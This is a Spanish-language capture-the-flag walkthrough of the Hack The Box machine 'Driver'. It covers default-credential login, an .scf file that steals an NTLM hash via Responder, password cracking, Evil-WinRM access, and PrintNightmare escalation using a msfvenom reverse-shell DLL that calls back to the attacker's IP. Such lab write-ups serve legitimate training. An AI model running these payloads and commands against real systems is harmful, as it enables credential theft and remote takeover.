Driver

Reconocimiento

Para empezar el escaneo, usaremos nmap:

sudo nmap -T4 --min-rate 1000 -p- -sCV -oN nmap_report 10.10.11.106

Podemos ver el puerto 80, 135, 445 y 5985 abiertos, por lo que empezaremos por el servidor web.

Web

De primeras nos pide credenciales pero usando admin:admin podemos entrar. Vamos a añadir el dominio que aparece al /etc/hosts.

Explotación

Por lo que podemos ver en este apartado podemos subir un firmware para que luego sea analizado por algún tester. Podemos probar a crear un archivo .scf (Shell Command File) con nuestra IP y nos pondremos a la escucha con el responder:

[Shell]  
Command=2  
IconFile=\\10.10.14.12\share\testing.ico  
[Taskbar]  
Command=ToggleDesktop

sudo responder -I tun0

John The Ripper

Obtenemos el hash de un usuario llamado tony, por lo que nos lo guardaremos. También vamos a intentar crackearla con jhon the ripper.

john tony_hash --wordlist=/usr/share/wordlists/rockyou.txt

Vemos que la contraseña es liltony, vamos a intentar acceder a WinRM (puerto 5985) con Evil-WinRM.

evil-winrm -i 10.10.11.106 -u tony -p liltony

Listo, vamos a ver la user flag.

Escalada de privilegios

Para la escalación podemos usar WinPEAS, para poder ver los posibles vectores de escalación.

upload /home/zelpro/Tools/winPEASx64.exe

./winPEASx64.exe

Podemos ver algo interesante, hay bastante información de Ricoh Printers. Buscando por exploits, he encontrado un exploit: https://github.com/cube0x0/CVE-2021-1675.

Para comenzar debermos crear una reverse shell con msfvenom con extensión .dll

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.34 LPORT=443 -f dll -o shell.dll

Ahora con impacket compartiremos este archivo con un servidor smb.

impacket-smbserver share .

Nos pondremos en escucha a la vez que ejecutamos el exploit.

nc -lvnp 443

python printnightmare.py driver/tony:liltony@10.10.11.106 '\\10.10.14.10\share\shell.dll'

Y ya podríamos obtener la root flag.

Máquina comprometidaPwned! · ver logro en Hack The Box